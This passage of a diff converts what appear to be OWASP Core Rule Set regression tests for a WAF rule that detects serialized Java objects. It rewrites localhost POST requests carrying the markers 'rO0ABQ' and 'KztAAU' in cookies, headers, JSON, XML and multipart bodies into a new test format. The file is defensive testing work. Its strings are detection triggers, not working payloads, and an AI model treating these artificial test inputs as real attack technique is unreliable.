"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "rO0ABQ=test" + output: + log: + expect_ids: [944210] + - test_id: 3 desc: "Cookie test includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=rO0ABQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=rO0ABQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 4 desc: "Cookie name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: rO0ABQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 
944210-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: rO0ABQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 5 desc: "Request header test includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: rO0ABQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: rO0ABQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 6 desc: "XML element includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: 
"/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944210] + - test_id: 7 desc: "XML attribute name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944210] + - test_id: 8 desc: "XML attribute value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: 
"POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944210] + - test_id: 9 desc: "XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log: + expect_ids: [944210] + - test_id: 10 desc: "Nested XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" 
- method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log: + expect_ids: [944210] + - test_id: 11 desc: "Content-Type text/plain includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log: + expect_ids: [944210] + - test_id: 12 desc: "Content-Type application/json arg value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"rO0ABQ\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"rO0ABQ\"}" + output: + log: + expect_ids: [944210] + - test_id: 13 desc: "Content-Type application/json arg name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"rO0ABQ\": \"test\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"rO0ABQ\": \"test\"}" + output: + log: + expect_ids: [944210] + - test_id: 14 desc: "Content-Type multipart/form-data json arg name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"rO0ABQ": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-15 + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 
80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"rO0ABQ": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-16 + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; 
name="payload" + Content-Type: application/xml - rO0ABQ - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-17 + rO0ABQ + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - rO0ABQ - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-18 + rO0ABQ + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 18 desc: "Argument test includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log: + expect_ids: [944210] + - test_id: 19 desc: "Argument name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "KztAAU=test" - output: - log_contains: "id \"944210\"" - - test_title: 944210-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "KztAAU=test" + output: + log: + expect_ids: [944210] + - test_id: 20 desc: "Cookie test includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - 
headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=KztAAU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=KztAAU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 21 desc: "Cookie name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: KztAAU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: KztAAU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + 
log: + expect_ids: [944210] + - test_id: 22 desc: "Request header test includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: KztAAU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: KztAAU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 23 desc: "XML element includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + 
uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944210] + - test_id: 24 desc: "XML attribute name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944210] + - test_id: 25 desc: "XML attribute value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944210] + - test_id: 26 desc: "XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "KztAAU" + output: + log: + expect_ids: [944210] + - test_id: 27 desc: "Nested XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "KztAAU" + output: + log: + expect_ids: [944210] + - test_id: 28 desc: "Content-Type text/plain includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log: + expect_ids: [944210] + - test_id: 29 desc: "Content-Type application/json arg value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"KztAAU\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
